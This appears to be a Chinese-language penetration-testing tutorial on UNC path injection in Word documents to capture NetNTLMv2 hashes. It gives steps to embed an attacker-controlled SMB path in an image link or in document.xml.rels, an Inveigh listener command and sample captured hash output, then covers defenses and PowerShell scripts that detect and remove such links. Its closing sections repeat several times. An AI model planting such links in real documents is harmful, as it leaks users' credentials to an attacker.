Microsoft Word UNC路径注入渗透技术详解<\/h1>

技术概述<\/h2>
UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时，系统会自动尝试访问攻击者控制的SMB共享，从而泄露用户的NTLMv2哈希凭证。<\/p>

攻击原理<\/h2>

UNC路径<\/strong>：通用命名约定路径(\server\share)用于访问网络资源<\/li>
NetNTLM哈希<\/strong>：Windows身份验证过程中传输的凭证哈希<\/li>

自动解析<\/strong>：Word会自动解析文档中的所有链接，包括图像链接<\/li> <\/ol>
所需工具<\/h2>

Burp Suite Pro<\/strong>：用于协作客户端验证<\/li>
Inveigh\/Responder<\/strong>：用于捕获NetNTLM哈希<\/li>
7zip<\/strong>：用于修改Word文档内部结构<\/li> <\/ul>
攻击步骤详解<\/h2>
方法一：通过Word界面插入恶意链接<\/h3>

打开Word文档，进入"插入"选项卡<\/li>
点击"图片"图标<\/li>
在文件名输入框中输入恶意UNC路径(如\\attacker-ip\share\image.png<\/code>)<\/li>
从"插入"下拉菜单中选择"链接到文件"<\/li>
调整图像大小和布局以提高隐蔽性<\/li>
保存文档<\/li> <\/ol> 方法二：直接修改Word文档内部结构<\/h3> 使用7zip打开.docx文件(直接作为压缩包处理)<\/li> 导航至word\/_rels\/document.xml.rels<\/code>文件<\/li> 修改Target属性为攻击者的UNC路径(如Target="file:\/\/\/\\192.168.1.100\share\image.png"<\/code>)<\/li> 保存修改并更新到.docx文件中<\/li> <\/ol> 捕获哈希<\/h3> 在攻击机器上启动Responder或Inveigh监听： PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 <\/span><\/span><\/code><\/pre><\/li> 等待受害者打开文档，捕获NTLMv2哈希： 2017-12-19T17:23:19 SMB NTLMv2 challenge\/response captured from 192.168.0.3(DESKTOP-2QRDJR2): Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000 <\/code><\/pre> <\/li> <\/ol> 防御措施<\/h2> 网络层防御<\/strong>：<\/p> 限制出站SMB流量(端口445\/TCP)<\/li> 启用SMB签名<\/li> <\/ul> <\/li> 系统层防御<\/strong>：<\/p> 配置组策略禁用NTLMv1<\/li> 启用SMBv3加密<\/li> <\/ul> <\/li> 用户教育<\/strong>：<\/p> 不要打开来源不明的Word文档<\/li> 注意文档中的异常图像或链接<\/li> <\/ul> <\/li> 技术控制<\/strong>：<\/p> 使用Office受保护的视图<\/li> 启用宏安全设置<\/li> <\/ul> <\/li> <\/ol> 高级技术：使用PowerShell枚举和修改Word关联<\/h2> 枚举文档关联目标<\/h3> $file = "C:\path\to\doc.docx"<\/span> <\/span><\/span>$word = New-Object -ComObject Word.Application <\/span><\/span>$doc = $word.documents.open($file) <\/span><\/span>$xml = New-Object System.XML.XMLDocument <\/span><\/span>$xml = $doc.WordOpenXML <\/span><\/span>$targets = $xml.package.part.xmlData.Relationships.Relationship <\/span><\/span>$targets | Format-Table <\/span><\/span>$word.Quit() <\/span><\/span><\/code><\/pre>使用OpenXML库安全枚举(不触发请求)<\/h3> [System.Reflection.Assembly]<\/span>::LoadFrom("C:\DocumentFormat.OpenXml.dll"<\/span>) <\/span><\/span>$file = "C:\path\to\doc.docx"<\/span> <\/span><\/span>$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]<\/span>::Open($file,$true) <\/span><\/span>$targets = $doc.MainDocumentPart.ExternalRelationships <\/span><\/span>$targets <\/span><\/span>$doc.Close() <\/span><\/span><\/code><\/pre>删除恶意关联<\/h3> $doc.MainDocumentPart.DeleteExternalRelationship("rId4"<\/span>) <\/span><\/span><\/code><\/pre>总结<\/h2> UNC路径注入攻击利用了Word文档处理外部资源的特性，具有高度隐蔽性，因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施，包括网络控制、系统加固和用户教育。<\/p>

Microsoft Word UNC路径注入渗透技术详解<\/h1>

技术概述<\/h2> UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时，系统会自动尝试访问攻击者控制的SMB共享，从而泄露用户的NTLMv2哈希凭证。<\/p>

攻击步骤详解<\/h2>

高级技术：使用PowerShell枚举和修改Word关联<\/h2>

总结<\/h2> UNC路径注入攻击利用了Word文档处理外部资源的特性，具有高度隐蔽性，因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施，包括网络控制、系统加固和用户教育。<\/p>

技术概述<\/h2>
UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时，系统会自动尝试访问攻击者控制的SMB共享，从而泄露用户的NTLMv2哈希凭证。<\/p>

总结<\/h2>
UNC路径注入攻击利用了Word文档处理外部资源的特性，具有高度隐蔽性，因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施，包括网络控制、系统加固和用户教育。<\/p>